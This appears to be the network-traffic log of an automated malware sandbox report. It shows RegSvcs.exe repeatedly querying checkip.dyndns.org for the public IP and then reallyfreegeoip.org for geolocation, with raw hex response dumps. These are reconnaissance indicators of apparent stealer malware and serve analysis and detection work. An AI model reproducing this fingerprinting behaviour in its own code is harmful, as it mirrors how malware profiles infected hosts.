                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                  Jan 8, 2025 15:44:06.450648069 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Jan 8, 2025 15:44:06.668267965 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:06 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.549707132.226.247.73804612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:07.345136881 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Jan 8, 2025 15:44:08.017226934 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:07 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.549709132.226.247.73804612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:08.791681051 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:09.412719965 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:09 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.549711132.226.247.73804612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:10.034434080 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:10.725920916 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:10 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.549713132.226.247.73804612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:11.382435083 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:12.051609039 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:11 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.549715132.226.247.73804612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:12.687886953 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:13.367024899 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:13 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.549717132.226.247.73804612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:13.969070911 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:14.652435064 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:14 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.549720132.226.247.73804612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:15.301491022 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:15.983721972 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:15 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.549754132.226.247.73805488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:21.344120026 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:22.028577089 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:21 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                  Jan 8, 2025 15:44:22.032052040 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Jan 8, 2025 15:44:22.242522001 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:22 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                  Jan 8, 2025 15:44:23.190187931 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Jan 8, 2025 15:44:23.401701927 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:23 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.549772132.226.247.73805488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:24.036158085 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Jan 8, 2025 15:44:24.706125021 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:24 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.2.549783132.226.247.73805488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:25.394895077 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:26.121742010 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:26 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  11192.168.2.549795132.226.247.73805488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:26.757416010 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:27.431449890 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:27 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  12192.168.2.549807132.226.247.73805488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:28.086678028 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:28.776391983 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:28 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  13192.168.2.549815132.226.247.73805488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:29.399910927 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:30.089771032 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:29 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  14192.168.2.549825132.226.247.73805488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:30.704711914 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:31.375387907 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:31 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  15192.168.2.549834132.226.247.73805488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:31.995208979 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:32.812037945 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:32 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549705188.114.96.34434612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:06 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:06 UTC858INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:06 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662235
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OhiYth%2Bc8YE%2FwMy5DmNRgmJ4xX0uYQQ8ZdC1N3Yr1le0A5jWt1hG%2BEPZu0bYxdRdBjjM00N7OKYWxzLAaTMDo3ErySGeqbATagSwdMhIO%2F2P5jjdKhkSv6%2BzkJlyAGMoDxPtAxZ0"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf6b3d8f84301-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1614&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1739130&cwnd=32&unsent_bytes=0&cid=fd71e0c0d6416317&ts=215&x=0"
                                                                                                  2025-01-08 14:44:06 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
